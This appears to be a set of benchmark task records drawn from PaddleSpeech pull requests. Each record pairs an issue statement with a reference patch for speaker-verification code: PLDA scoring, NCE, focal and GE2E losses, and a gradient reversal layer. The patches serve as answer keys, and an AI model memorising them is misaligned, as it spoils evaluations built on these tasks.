+        # Case of open-set identification, we compute the log-likelihood
+        # by taking into account the probability of having a known impostor
+        # or an out-of set class
+        if p_known != 0:
+            N = score.scoremat.shape[0]
+            open_set_scores = numpy.empty(score.scoremat.shape)
+            tmp = numpy.exp(score.scoremat)
+            for ii in range(N):
+                # open-set term
+                open_set_scores[ii, :] = score.scoremat[ii, :] - numpy.log(
+                    p_known * tmp[~(numpy.arange(N) == ii)].sum(axis=0) / (
+                        N - 1) + (1 - p_known))
+            score.scoremat = open_set_scores
+
+        return score
+
+
+if __name__ == '__main__':
+    import random
+
+    dim, N, n_spkrs = 10, 100, 10
+    train_xv = numpy.random.rand(N, dim)
+    md = ['md' + str(random.randrange(1, n_spkrs, 1)) for i in range(N)]  # spk
+    modelset = numpy.array(md, dtype="|O")
+    sg = ['sg' + str(i) for i in range(N)]  # utt
+    segset = numpy.array(sg, dtype="|O")
+    stat0 = numpy.array([[1.0]] * N)
+    xvectors_stat = EmbeddingMeta(
+        modelset=modelset, segset=segset, stats=train_xv)
+    # Training PLDA model: M ~ (mean, F, Sigma)
+    plda = PLDA(rank_f=5)
+    plda.plda(xvectors_stat)
+    print(plda.mean.shape)  #(10,)
+    print(plda.F.shape)  #(10, 5)
+    print(plda.Sigma.shape)  #(10, 10)
+    # Enrollment (20 utts),
+    en_N = 20
+    en_xv = numpy.random.rand(en_N, dim)
+    en_sgs = ['en' + str(i) for i in range(en_N)]
+    en_sets = numpy.array(en_sgs, dtype="|O")
+    en_stat = EmbeddingMeta(modelset=en_sets, segset=en_sets, stats=en_xv)
+    # Test (30 utts)
+    te_N = 30
+    te_xv = numpy.random.rand(te_N, dim)
+    te_sgs = ['te' + str(i) for i in range(te_N)]
+    te_sets = numpy.array(te_sgs, dtype="|O")
+    te_stat = EmbeddingMeta(modelset=te_sets, segset=te_sets, stats=te_xv)
+    ndx = Ndx(models=en_sets, testsegs=te_sets)  # trials
+    # PLDA Scoring
+    scores_plda = plda.scoring(en_stat, te_stat, ndx)
+    print(scores_plda.scoremat.shape)  #(20, 30)
diff --git a/paddlespeech/vector/io/dataset_from_json.py b/paddlespeech/vector/io/dataset_from_json.py
--- a/paddlespeech/vector/io/dataset_from_json.py
+++ b/paddlespeech/vector/io/dataset_from_json.py
@@ -26,14 +26,14 @@ class meta_info:
     """the audio meta info in the vector JSONDataset
 
     Args:
-        id (str): the segment name
+        utt_id (str): the segment name
         duration (float): segment time
         wav (str): wav file path
         start (int): start point in the original wav file
         stop (int): stop point in the original wav file
         lab_id (str): the record id
     """
-    id: str
+    utt_id: str
     duration: float
     wav: str
     start: int
```
problem_statement:
[vec] add PLDA model

created_at: 2022-04-08T10:17:52
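For readers of the `scoring` method in the patch above: the fast-scoring form it implements can be written out explicitly. This is a direct transcription of what the code computes, with x_e an enrollment x-vector and x_t a test x-vector:

```latex
\[
\Sigma_{ac} = F F^{\top}, \qquad \Sigma_{tot} = \Sigma_{ac} + \Sigma, \qquad
T = \left(\Sigma_{tot} - \Sigma_{ac}\,\Sigma_{tot}^{-1}\,\Sigma_{ac}\right)^{-1},
\]
\[
\Phi = \Sigma_{tot}^{-1} - T, \qquad \Psi = \Sigma_{tot}^{-1}\,\Sigma_{ac}\,T,
\]
\[
s(x_e, x_t) = \tfrac{1}{2}\,x_e^{\top}\Phi\,x_e + \tfrac{1}{2}\,x_t^{\top}\Phi\,x_t
            + x_e^{\top}\Psi\,x_t + \text{const.}
\]
```

Here F and Σ are the eigenvoice and residual matrices trained by `PLDA.plda`, and the constant is the `plda_cst` log-determinant term in the code.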
---
repo: PaddlePaddle/PaddleSpeech
pull_number: 1690
instance_id: PaddlePaddle__PaddleSpeech-1690
issue_numbers: ["1689"]
base_commit: 48e017776783b49a5769ce6ac37e1ad67bac9ec0
patch:
```diff
diff --git a/paddlespeech/vector/exps/ecapa_tdnn/train.py b/paddlespeech/vector/exps/ecapa_tdnn/train.py
--- a/paddlespeech/vector/exps/ecapa_tdnn/train.py
+++ b/paddlespeech/vector/exps/ecapa_tdnn/train.py
@@ -42,6 +42,12 @@
 
 
 def main(args, config):
+    """The main process for test the speaker verification model
+
+    Args:
+        args (argparse.Namespace): the command line args namespace
+        config (yacs.config.CfgNode): the yaml config
+    """
     # stage0: set the training device, cpu or gpu
     paddle.set_device(args.device)
 
@@ -49,11 +55,11 @@ def main(args, config):
     paddle.distributed.init_parallel_env()
     nranks = paddle.distributed.get_world_size()
     local_rank = paddle.distributed.get_rank()
-    # set the random seed, it is a must for multiprocess training
+    # set the random seed, it is the necessary measures for multiprocess training
     seed_everything(config.seed)
 
     # stage2: data prepare, such vox1 and vox2 data, and augment noise data and pipline
-    # note: some cmd must do in rank==0, so wo will refactor the data prepare code
+    # note: some operations must be done in rank==0
     train_dataset = CSVDataset(
         csv_path=os.path.join(args.data_dir, "vox/csv/train.csv"),
         label2id_path=os.path.join(args.data_dir, "vox/meta/label2id.txt"))
@@ -61,12 +67,14 @@ def main(args, config):
         csv_path=os.path.join(args.data_dir, "vox/csv/dev.csv"),
         label2id_path=os.path.join(args.data_dir, "vox/meta/label2id.txt"))
 
+    # we will build the augment pipeline process list
     if config.augment:
         augment_pipeline = build_augment_pipeline(target_dir=args.data_dir)
     else:
         augment_pipeline = []
 
     # stage3: build the dnn backbone model network
+    # in speaker verification period, we use the backbone mode to extract the audio embedding
    ecapa_tdnn = EcapaTdnn(**config.model)
 
     # stage4: build the speaker verification train instance with backbone model
@@ -77,13 +85,15 @@ def main(args, config):
     # 140000 is single gpu steps
     # so, in multi-gpu mode, wo reduce the step_size to 140000//nranks to enable CyclicLRScheduler
     lr_schedule = CyclicLRScheduler(
-        base_lr=config.learning_rate, max_lr=1e-3, step_size=140000 // nranks)
+        base_lr=config.learning_rate,
+        max_lr=config.max_lr,
+        step_size=config.step_size // nranks)
     optimizer = paddle.optimizer.AdamW(
         learning_rate=lr_schedule, parameters=model.parameters())
 
     # stage6: build the loss function, we now only support LogSoftmaxWrapper
     criterion = LogSoftmaxWrapper(
-        loss_fn=AdditiveAngularMargin(margin=0.2, scale=30))
+        loss_fn=AdditiveAngularMargin(margin=config.margin, scale=config.scale))
 
     # stage7: confirm training start epoch
     # if pre-trained model exists, start epoch confirmed by the pre-trained model
@@ -225,7 +235,7 @@ def main(args, config):
                 print_msg += ' avg_train_cost: {:.5f} sec,'.format(
                     train_run_cost / config.log_interval)
-                print_msg += ' lr={:.4E} step/sec={:.2f} ips:{:.5f}| ETA {}'.format(
+                print_msg += ' lr={:.4E} step/sec={:.2f} ips={:.5f}| ETA {}'.format(
                     lr, timer.timing, timer.ips, timer.eta)
                 logger.info(print_msg)
diff --git a/paddlespeech/vector/io/embedding_norm.py b/paddlespeech/vector/io/embedding_norm.py
--- a/paddlespeech/vector/io/embedding_norm.py
+++ b/paddlespeech/vector/io/embedding_norm.py
@@ -57,14 +57,14 @@ def __call__(self,
             lengths (paddle.Tensor): A batch of tensors containing the relative length of each
                 sentence (e.g, [0.7, 0.9, 1.0]). It is used to avoid
                 computing stats on zero-padded steps.
-            spk_ids (_type_, optional): tensor containing the ids of each speaker (e.g, [0 10 6]).
+            spk_ids (paddle.Tensor, optional): tensor containing the ids of each speaker (e.g, [0 10 6]).
                 It is used to perform per-speaker normalization when
                 norm_type='speaker'. Defaults to paddle.to_tensor([], dtype="float32").
         Returns:
             paddle.Tensor: The normalized feature or embedding
         """
         N_batches = x.shape[0]
-        # print(f"x shape: {x.shape[1]}")
+
         current_means = []
         current_stds = []
 
@@ -75,6 +75,9 @@ def __call__(self,
             actual_size = paddle.round(lengths[snt_id] *
                                        x.shape[1]).astype("int32")
             # computing actual time data statistics
+            # we extract the snt_id embedding from the x
+            # and the target paddle.Tensor will reduce an 0-axis
+            # so we need unsqueeze operation to recover the all axis
             current_mean, current_std = self._compute_current_stats(
                 x[snt_id, 0:actual_size, ...].unsqueeze(0))
             current_means.append(current_mean)
diff --git a/paddlespeech/vector/exps/ecapa_tdnn/test.py b/paddlespeech/vector/exps/ecapa_tdnn/test.py
--- a/paddlespeech/vector/exps/ecapa_tdnn/test.py
+++ b/paddlespeech/vector/exps/ecapa_tdnn/test.py
@@ -38,10 +38,10 @@ def compute_dataset_embedding(data_loader, model, mean_var_norm_emb, config,
     """compute the dataset embeddings
 
     Args:
-        data_loader (_type_): _description_
-        model (_type_): _description_
-        mean_var_norm_emb (_type_): _description_
-        config (_type_): _description_
+        data_loader (paddle.io.Dataloader): the dataset loader to be compute the embedding
+        model (paddle.nn.Layer): the speaker verification model
+        mean_var_norm_emb : compute the embedding mean and std norm
+        config (yacs.config.CfgNode): the yaml config
     """
     logger.info(
         f'Computing embeddings on {data_loader.dataset.csv_path} dataset')
@@ -65,6 +65,17 @@ def compute_dataset_embedding(data_loader, model, mean_var_norm_emb, config,
 
 
 def compute_verification_scores(id2embedding, train_cohort, config):
+    """Compute the verification trial scores
+
+    Args:
+        id2embedding (dict): the utterance embedding
+        train_cohort (paddle.tensor): the cohort dataset embedding
+        config (yacs.config.CfgNode): the yaml config
+
+    Returns:
+        the scores and the trial labels,
+        1 refers the target and 0 refers the nontarget in labels
+    """
     labels = []
     enroll_ids = []
     test_ids = []
@@ -119,20 +130,32 @@ def compute_verification_scores(id2embedding, train_cohort, config):
 
 
 def main(args, config):
+    """The main process for test the speaker verification model
+
+    Args:
+        args (argparse.Namespace): the command line args namespace
+        config (yacs.config.CfgNode): the yaml config
+    """
+    # stage0: set the training device, cpu or gpu
+    # if set the gpu, paddlespeech will select a gpu according the env CUDA_VISIBLE_DEVICES
     paddle.set_device(args.device)
-    # set the random seed, it is a must for multiprocess training
+    # set the random seed, it is the necessary measures for multiprocess training
     seed_everything(config.seed)
 
     # stage1: build the dnn backbone model network
+    # we will extract the audio embedding from the backbone model
     ecapa_tdnn = EcapaTdnn(**config.model)
 
     # stage2: build the speaker verification eval instance with backbone model
+    # because the checkpoint dict name has the SpeakerIdetification prefix
+    # so we need to create the SpeakerIdetification instance
+    # but we acutally use the backbone model to extact the audio embedding
     model = SpeakerIdetification(
         backbone=ecapa_tdnn, num_class=config.num_speakers)
 
     # stage3: load the pre-trained model
-    # we get the last model from the epoch and save_interval
+    # generally, we get the last model from the epoch
     args.load_checkpoint = os.path.abspath(
         os.path.expanduser(args.load_checkpoint))
 
@@ -143,7 +166,8 @@ def main(args, config):
     logger.info(f'Checkpoint loaded from {args.load_checkpoint}')
 
     # stage4: construct the enroll and test dataloader
-
+    # Now, wo think the enroll dataset is in the {args.data_dir}/vox/csv/enroll.csv,
+    # and the test dataset is in the {args.data_dir}/vox/csv/test.csv
     enroll_dataset = CSVDataset(
         os.path.join(args.data_dir, "vox/csv/enroll.csv"),
         feat_type='melspectrogram',
@@ -152,14 +176,14 @@ def main(args, config):
         window_size=config.window_size,
         hop_length=config.hop_size)
     enroll_sampler = BatchSampler(
-        enroll_dataset, batch_size=config.batch_size,
-        shuffle=False)  # Shuffle to make embedding normalization more robust.
+        enroll_dataset, batch_size=config.batch_size, shuffle=False)
     enroll_loader = DataLoader(enroll_dataset,
                                batch_sampler=enroll_sampler,
                                collate_fn=lambda x: batch_feature_normalize(
                                    x, mean_norm=True, std_norm=False),
                                num_workers=config.num_workers,
                                return_list=True,)
+
     test_dataset = CSVDataset(
         os.path.join(args.data_dir, "vox/csv/test.csv"),
         feat_type='melspectrogram',
@@ -167,7 +191,6 @@ def main(args, config):
         n_mels=config.n_mels,
         window_size=config.window_size,
         hop_length=config.hop_size)
-
     test_sampler = BatchSampler(
         test_dataset, batch_size=config.batch_size, shuffle=False)
     test_loader = DataLoader(test_dataset,
@@ -180,16 +203,17 @@ def main(args, config):
     model.eval()
 
     # stage6: global embedding norm to imporve the performance
+    # and we create the InputNormalization instance to process the embedding mean and std norm
     logger.info(f"global embedding norm: {config.global_embedding_norm}")
-
-    # stage7: Compute embeddings of audios in enrol and test dataset from model.
-
     if config.global_embedding_norm:
         mean_var_norm_emb = InputNormalization(
             norm_type="global",
             mean_norm=config.embedding_mean_norm,
             std_norm=config.embedding_std_norm)
 
+    # stage 7: score norm need the imposters dataset
+    # we select the train dataset as the idea imposters dataset
+    # and we select the config.n_train_snts utterance to as the final imposters dataset
     if "score_norm" in config:
         logger.info(f"we will do score norm: {config.score_norm}")
         train_dataset = CSVDataset(
@@ -209,6 +233,7 @@ def main(args, config):
             num_workers=config.num_workers,
             return_list=True,)
 
+    # stage 8: Compute embeddings of audios in enrol and test dataset from model.
     id2embedding = {}
     # Run multi times to make embedding normalization more stable.
     logger.info("First loop for enroll and test dataset")
@@ -225,7 +250,7 @@ def main(args, config):
         mean_var_norm_emb.save(
             os.path.join(args.load_checkpoint, "mean_var_norm_emb"))
 
-    # stage 8: Compute cosine scores.
+    # stage 9: Compute cosine scores.
     train_cohort = None
     if "score_norm" in config:
         train_embeddings = {}
@@ -234,11 +259,11 @@ def main(args, config):
                                   train_embeddings)
         train_cohort = paddle.stack(list(train_embeddings.values()))
 
-    # compute the scores
+    # stage 10: compute the scores
     scores, labels = compute_verification_scores(id2embedding, train_cohort,
                                                  config)
 
-    # compute the EER and threshold
+    # stage 11: compute the EER and threshold
     scores = paddle.to_tensor(scores)
     EER, threshold = compute_eer(np.asarray(labels), scores.numpy())
     logger.info(
```
problem_statement:
[vec] complete the speaker verification notes and speakers in yaml

Currently the number of speakers in conf/ecapa_tdnn.yaml is 1211, but vox1 & vox2 together contain 7205 speakers.

created_at: 2022-04-12T05:41:17
---
repo: PaddlePaddle/PaddleSpeech
pull_number: 1719
instance_id: PaddlePaddle__PaddleSpeech-1719
issue_numbers: ["1717"]
base_commit: 880829fe898ff7f6fde6f23d2c27042a3055d781
patch:
```diff
diff --git a/paddlespeech/vector/modules/loss.py b/paddlespeech/vector/modules/loss.py
--- a/paddlespeech/vector/modules/loss.py
+++ b/paddlespeech/vector/modules/loss.py
@@ -91,3 +91,137 @@ def forward(self, outputs, targets, length=None):
         predictions = F.log_softmax(predictions, axis=1)
         loss = self.criterion(predictions, targets) / targets.sum()
         return loss
+
+
+class NCELoss(nn.Layer):
+    """Noise Contrastive Estimation loss funtion
+
+    Noise Contrastive Estimation (NCE) is an approximation method that is used to
+    work around the huge computational cost of large softmax layer.
+    The basic idea is to convert the prediction problem into classification problem
+    at training stage. It has been proved that these two criterions converges to
+    the same minimal point as long as noise distribution is close enough to real one.
+
+    NCE bridges the gap between generative models and discriminative models,
+    rather than simply speedup the softmax layer.
+    With NCE, you can turn almost anything into posterior with less effort (I think).
+
+    Refs:
+        NCE:http://www.cs.helsinki.fi/u/ahyvarin/papers/Gutmann10AISTATS.pdf
+        Thanks: https://github.com/mingen-pan/easy-to-use-NCE-RNN-for-Pytorch/blob/master/nce.py
+
+    Examples:
+        Q = Q_from_tokens(output_dim)
+        NCELoss(Q)
+    """
+
+    def __init__(self, Q, noise_ratio=100, Z_offset=9.5):
+        """Noise Contrastive Estimation loss funtion
+
+        Args:
+            Q (tensor): prior model, uniform or guassian
+            noise_ratio (int, optional): noise sampling times. Defaults to 100.
+            Z_offset (float, optional): scale of post processing the score. Defaults to 9.5.
+        """
+        super(NCELoss, self).__init__()
+        assert type(noise_ratio) is int
+        self.Q = paddle.to_tensor(Q, stop_gradient=False)
+        self.N = self.Q.shape[0]
+        self.K = noise_ratio
+        self.Z_offset = Z_offset
+
+    def forward(self, output, target):
+        """Forward inference
+
+        Args:
+            output (tensor): the model output, which is the input of loss function
+        """
+        output = paddle.reshape(output, [-1, self.N])
+        B = output.shape[0]
+        noise_idx = self.get_noise(B)
+        idx = self.get_combined_idx(target, noise_idx)
+        P_target, P_noise = self.get_prob(idx, output, sep_target=True)
+        Q_target, Q_noise = self.get_Q(idx)
+        loss = self.nce_loss(P_target, P_noise, Q_noise, Q_target)
+        return loss.mean()
+
+    def get_Q(self, idx, sep_target=True):
+        """Get prior model of batchsize data
+        """
+        idx_size = idx.size
+        prob_model = paddle.to_tensor(
+            self.Q.numpy()[paddle.reshape(idx, [-1]).numpy()])
+        prob_model = paddle.reshape(prob_model, [idx.shape[0], idx.shape[1]])
+        if sep_target:
+            return prob_model[:, 0], prob_model[:, 1:]
+        else:
+            return prob_model
+
+    def get_prob(self, idx, scores, sep_target=True):
+        """Post processing the score of post model(output of nn) of batchsize data
+        """
+        scores = self.get_scores(idx, scores)
+        scale = paddle.to_tensor([self.Z_offset], dtype='float32')
+        scores = paddle.add(scores, -scale)
+        prob = paddle.exp(scores)
+        if sep_target:
+            return prob[:, 0], prob[:, 1:]
+        else:
+            return prob
+
+    def get_scores(self, idx, scores):
+        """Get the score of post model(output of nn) of batchsize data
+        """
+        B, N = scores.shape
+        K = idx.shape[1]
+        idx_increment = paddle.to_tensor(
+            N * paddle.reshape(paddle.arange(B), [B, 1]) * paddle.ones([1, K]),
+            dtype="int64",
+            stop_gradient=False)
+        new_idx = idx_increment + idx
+        new_scores = paddle.index_select(
+            paddle.reshape(scores, [-1]), paddle.reshape(new_idx, [-1]))
+
+        return paddle.reshape(new_scores, [B, K])
+
+    def get_noise(self, batch_size, uniform=True):
+        """Select noise sample
+        """
+        if uniform:
+            noise = np.random.randint(self.N, size=self.K * batch_size)
+        else:
+            noise = np.random.choice(
+                self.N, self.K * batch_size, replace=True, p=self.Q.data)
+        noise = paddle.to_tensor(noise, dtype='int64', stop_gradient=False)
+        noise_idx = paddle.reshape(noise, [batch_size, self.K])
+        return noise_idx
+
+    def get_combined_idx(self, target_idx, noise_idx):
+        """Combined target and noise
+        """
+        target_idx = paddle.reshape(target_idx, [-1, 1])
+        return paddle.concat((target_idx, noise_idx), 1)
+
+    def nce_loss(self, prob_model, prob_noise_in_model, prob_noise,
+                 prob_target_in_noise):
+        """Combined the loss of target and noise
+        """
+
+        def safe_log(tensor):
+            """Safe log
+            """
+            EPSILON = 1e-10
+            return paddle.log(EPSILON + tensor)
+
+        model_loss = safe_log(prob_model /
+                              (prob_model + self.K * prob_target_in_noise))
+        model_loss = paddle.reshape(model_loss, [-1])
+
+        noise_loss = paddle.sum(
+            safe_log((self.K * prob_noise) /
+                     (prob_noise_in_model + self.K * prob_noise)), -1)
+        noise_loss = paddle.reshape(noise_loss, [-1])
+
+        loss = -(model_loss + noise_loss)
+
+        return loss
diff --git a/paddlespeech/vector/utils/vector_utils.py b/paddlespeech/vector/utils/vector_utils.py
--- a/paddlespeech/vector/utils/vector_utils.py
+++ b/paddlespeech/vector/utils/vector_utils.py
@@ -30,3 +30,11 @@ def get_chunks(seg_dur, audio_id, audio_duration):
         for i in range(num_chunks)
     ]
     return chunk_lst
+
+
+def Q_from_tokens(token_num):
+    """Get prior model, data from uniform, would support others(guassian) in future
+    """
+    freq = [1] * token_num
+    Q = paddle.to_tensor(freq, dtype='float64')
+    return Q / Q.sum()
```
problem_statement:
[vec] support large scale speaker training

created_at: 2022-04-19T08:31:53
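The `nce_loss` method in the patch above combines a target term and a noise term; transcribed into a formula (K is `noise_ratio`, P is the exponentiated, Z-offset-shifted network score, Q is the prior built by `Q_from_tokens`, and the n_i are the K sampled noise classes):

```latex
\[
\mathcal{L}_{\mathrm{NCE}} = -\left[
  \log \frac{P(y \mid x)}{P(y \mid x) + K\,Q(y)}
  + \sum_{i=1}^{K} \log \frac{K\,Q(n_i)}{P(n_i \mid x) + K\,Q(n_i)}
\right]
\]
```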
---
repo: PaddlePaddle/PaddleSpeech
pull_number: 1722
instance_id: PaddlePaddle__PaddleSpeech-1722
issue_numbers: ["1721"]
base_commit: 9382ad8a161c6247b196d9b3ee0259ee05df28d1
patch:
```diff
diff --git a/paddlespeech/vector/modules/loss.py b/paddlespeech/vector/modules/loss.py
--- a/paddlespeech/vector/modules/loss.py
+++ b/paddlespeech/vector/modules/loss.py
@@ -132,7 +132,7 @@ def __init__(self, Q, noise_ratio=100, Z_offset=9.5):
 
     def forward(self, output, target):
         """Forward inference
-        
+
         Args:
             output (tensor): the model output, which is the input of loss function
         """
@@ -161,7 +161,7 @@ def get_prob(self, idx, scores, sep_target=True):
         """Post processing the score of post model(output of nn) of batchsize data
         """
         scores = self.get_scores(idx, scores)
-        scale = paddle.to_tensor([self.Z_offset], dtype='float32')
+        scale = paddle.to_tensor([self.Z_offset], dtype='float64')
         scores = paddle.add(scores, -scale)
         prob = paddle.exp(scores)
         if sep_target:
@@ -225,3 +225,65 @@ def safe_log(tensor):
         loss = -(model_loss + noise_loss)
 
         return loss
+
+
+class FocalLoss(nn.Layer):
+    """This criterion is a implemenation of Focal Loss, which is proposed in
+    Focal Loss for Dense Object Detection.
+
+        Loss(x, class) = - \alpha (1-softmax(x)[class])^gamma \log(softmax(x)[class])
+
+    The losses are averaged across observations for each minibatch.
+
+    Args:
+        alpha(1D Tensor, Variable) : the scalar factor for this criterion
+        gamma(float, double) : gamma > 0; reduces the relative loss for well-classified examples (p > .5),
+                               putting more focus on hard, misclassified examples
+        size_average(bool): By default, the losses are averaged over observations for each minibatch.
+                            However, if the field size_average is set to False, the losses are
+                            instead summed for each minibatch.
+    """
+
+    def __init__(self, alpha=1, gamma=0, size_average=True, ignore_index=-100):
+        super(FocalLoss, self).__init__()
+        self.alpha = alpha
+        self.gamma = gamma
+        self.size_average = size_average
+        self.ce = nn.CrossEntropyLoss(
+            ignore_index=ignore_index, reduction="none")
+
+    def forward(self, outputs, targets):
+        """Forword inference.
+
+        Args:
+            outputs: input tensor
+            target: target label tensor
+        """
+        ce_loss = self.ce(outputs, targets)
+        pt = paddle.exp(-ce_loss)
+        focal_loss = self.alpha * (1 - pt)**self.gamma * ce_loss
+        if self.size_average:
+            return focal_loss.mean()
+        else:
+            return focal_loss.sum()
+
+
+if __name__ == "__main__":
+    import numpy as np
+    from paddlespeech.vector.utils.vector_utils import Q_from_tokens
+    paddle.set_device("cpu")
+
+    input_data = paddle.uniform([5, 100], dtype="float64")
+    label_data = np.random.randint(0, 100, size=(5)).astype(np.int64)
+
+    input = paddle.to_tensor(input_data)
+    label = paddle.to_tensor(label_data)
+
+    loss1 = FocalLoss()
+    loss = loss1.forward(input, label)
+    print("loss: %.5f" % (loss))
+
+    Q = Q_from_tokens(100)
+    loss2 = NCELoss(Q)
+    loss = loss2.forward(input, label)
+    print("loss: %.5f" % (loss))
diff --git a/paddlespeech/vector/utils/vector_utils.py b/paddlespeech/vector/utils/vector_utils.py
--- a/paddlespeech/vector/utils/vector_utils.py
+++ b/paddlespeech/vector/utils/vector_utils.py
@@ -11,6 +11,7 @@
 # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 # See the License for the specific language governing permissions and
 # limitations under the License.
+import paddle
 
 
 def get_chunks(seg_dur, audio_id, audio_duration):
```
problem_statement:
[vec] deal with class imbalances

created_at: 2022-04-20T03:42:57
---
repo: PaddlePaddle/PaddleSpeech
pull_number: 1725
instance_id: PaddlePaddle__PaddleSpeech-1725
issue_numbers: ["1724"]
base_commit: bc28386d0c0ea5ccbb290e92af0045184f18065c
patch:
```diff
diff --git a/paddlespeech/vector/modules/layer.py b/paddlespeech/vector/modules/layer.py
new file mode 100644
--- /dev/null
+++ b/paddlespeech/vector/modules/layer.py
@@ -0,0 +1,76 @@
+# Copyright (c) 2022 PaddlePaddle Authors. All Rights Reserved.
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+#     http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+import paddle
+import paddle.nn as nn
+from paddle.autograd import PyLayer
+
+
+class GradientReversalFunction(PyLayer):
+    """Gradient Reversal Layer from:
+        Unsupervised Domain Adaptation by Backpropagation (Ganin & Lempitsky, 2015)
+
+    Forward pass is the identity function. In the backward pass,
+    the upstream gradients are multiplied by -lambda (i.e. gradient is reversed)
+    """
+
+    @staticmethod
+    def forward(ctx, x, lambda_=1):
+        """Forward in networks
+        """
+        ctx.save_for_backward(lambda_)
+        return x.clone()
+
+    @staticmethod
+    def backward(ctx, grads):
+        """Backward in networks
+        """
+        lambda_, = ctx.saved_tensor()
+        dx = -lambda_ * grads
+        return dx
+
+
+class GradientReversalLayer(nn.Layer):
+    """Gradient Reversal Layer from:
+        Unsupervised Domain Adaptation by Backpropagation (Ganin & Lempitsky, 2015)
+
+    Forward pass is the identity function. In the backward pass,
+    the upstream gradients are multiplied by -lambda (i.e. gradient is reversed)
+    """
+
+    def __init__(self, lambda_=1):
+        super(GradientReversalLayer, self).__init__()
+        self.lambda_ = lambda_
+
+    def forward(self, x):
+        """Forward in networks
+        """
+        return GradientReversalFunction.apply(x, self.lambda_)
+
+
+if __name__ == "__main__":
+    paddle.set_device("cpu")
+
+    data = paddle.randn([2, 3], dtype="float64")
+    data.stop_gradient = False
+    grl = GradientReversalLayer(1)
+    out = grl(data)
+    out.mean().backward()
+    print(data.grad)
+
+    data = paddle.randn([2, 3], dtype="float64")
+    data.stop_gradient = False
+    grl = GradientReversalLayer(-1)
+    out = grl(data)
+    out.mean().backward()
+    print(data.grad)
```
problem_statement:
[vec] add GRL to domain adaptation

created_at: 2022-04-20T06:47:59
---
repo: PaddlePaddle/PaddleSpeech
pull_number: 1731
instance_id: PaddlePaddle__PaddleSpeech-1731
issue_numbers: ["1730"]
base_commit: 0186f522af1270f3a559caa1009675c2eafe0a66
patch:
```diff
diff --git a/paddlespeech/vector/modules/loss.py b/paddlespeech/vector/modules/loss.py
--- a/paddlespeech/vector/modules/loss.py
+++ b/paddlespeech/vector/modules/loss.py
@@ -18,6 +18,7 @@
 import paddle
 import paddle.nn as nn
 import paddle.nn.functional as F
+from paddle.nn import initializer as I
 
 
 class AngularMargin(nn.Layer):
@@ -268,22 +269,128 @@ def forward(self, outputs, targets):
             return focal_loss.sum()
 
 
+class GE2ELoss(nn.Layer):
+    """Generalized end-to-end loss which defined in the paper "GENERALIZED END-TO-END LOSS FOR SPEAKER VERIFICATION"
+    """
+
+    def __init__(self, init_w=10.0, init_b=-5.0, loss_method="softmax"):
+        super(GE2ELoss, self).__init__()
+        self.loss_method = loss_method.lower()
+        self.w = self.create_parameter(
+            [1], default_initializer=I.Constant(init_w))
+        self.b = self.create_parameter(
+            [1], default_initializer=I.Constant(init_b))
+        assert self.loss_method in ["softmax", "contrast"]
+
+    def get_cossim(self, embeddings_list, centroids):
+        """Compute cosine similarity for each speaker
+        """
+        cossims = []
+        for s_idx, embeddings in enumerate(embeddings_list):
+            cossim = F.linear(embeddings, centroids.t())
+            e_num = len(embeddings)
+            if embeddings.ndim > 1 and e_num > 1:
+                expand_centroids = paddle.expand(
+                    centroids[s_idx], shape=[e_num, embeddings.shape[1]])
+                new_centroids = (expand_centroids * e_num - embeddings) / (
+                    e_num - 1)
+                sims = F.cosine_similarity(embeddings, new_centroids)
+                cossim[:, s_idx] = sims
+            cossims.append(self.w * cossim + self.b)
+
+        return cossims
+
+    def cal_softmax_loss(self, cossims):
+        """Calculate softmax loss
+        """
+        loss = 0.0
+        n = 0
+        for s_idx, cossim in enumerate(cossims):
+            loss += -F.log_softmax(cossim, axis=1)[:, s_idx].sum()
+            n += cossim.shape[0]
+
+        return loss / n
+
+    def cal_contrast_loss(self, cossims):
+        """Calculate contrast loss
+        """
+        loss = 0.0
+        n = 0
+        for s_idx, cossim in enumerate(cossims):
+            cossim = F.sigmoid(cossim)
+            col_loss = 1. - cossim[:, s_idx]
+            if len(cossims) > 1:
+                if s_idx == 0:
+                    excl_centroids_sigmoids = cossim[:, s_idx + 1:]
+                elif s_idx == (len(cossims) - 1):
+                    excl_centroids_sigmoids = cossim[:, :s_idx]
+                else:
+                    excl_centroids_sigmoids = paddle.concat(
+                        (cossim[:, :s_idx], cossim[:, s_idx + 1:]), axis=1)
+                col_loss += paddle.max(excl_centroids_sigmoids, axis=1)[0]
+            loss += col_loss.sum()
+            n += cossim.shape[0]
+
+        return loss / n
+
+    def forward(self, output, target):
+        """Forward inference
+
+        Args:
+            output: input tensor
+            target: target label tensor
+        """
+        spkers = paddle.unique(target)
+
+        embeddings_list = []
+        for spkid in spkers:
+            index = (target == spkid).nonzero().reshape([-1])
+            embeddings_list.append(output[index])
+        # cal centroid
+        centroids = []
+        for embeddings in embeddings_list:
+            if (embeddings.ndim > 1):
+                spker_centroid = paddle.mean(embeddings, axis=0)
+            else:
+                spker_centroid = embeddings
+            centroids.append(spker_centroid.clone() / paddle.norm(
+                spker_centroid, axis=0, keepdim=True))
+        centroids = paddle.stack(centroids)
+        # cal cosine similarity
+        cossims = self.get_cossim(embeddings_list, centroids)
+
+        # cal loss
+        if self.loss_method == "softmax":
+            loss = self.cal_softmax_loss(cossims)
+        else:
+            loss = self.cal_contrast_loss(cossims)
+
+        return loss
+
+
 if __name__ == "__main__":
     import numpy as np
     from paddlespeech.vector.utils.vector_utils import Q_from_tokens
     paddle.set_device("cpu")
 
-    input_data = paddle.uniform([5, 100], dtype="float64")
-    label_data = np.random.randint(0, 100, size=(5)).astype(np.int64)
-
+    input_data = paddle.uniform([32, 100], dtype="float64")
+    label_data = np.random.randint(0, 4, size=(32)).astype(np.int64)
     input = paddle.to_tensor(input_data)
     label = paddle.to_tensor(label_data)
 
-    loss1 = FocalLoss()
+    loss1 = GE2ELoss(loss_method="softmax")
     loss = loss1.forward(input, label)
-    print("loss: %.5f" % (loss))
+    print("GE2ELoss softmax-loss: %.5f" % (loss[0]))
 
-    Q = Q_from_tokens(100)
-    loss2 = NCELoss(Q)
+    loss2 = GE2ELoss(loss_method="contrast")
     loss = loss2.forward(input, label)
-    print("loss: %.5f" % (loss))
+    print("GE2ELoss contrast-loss: %.5f" % (loss[0]))
+
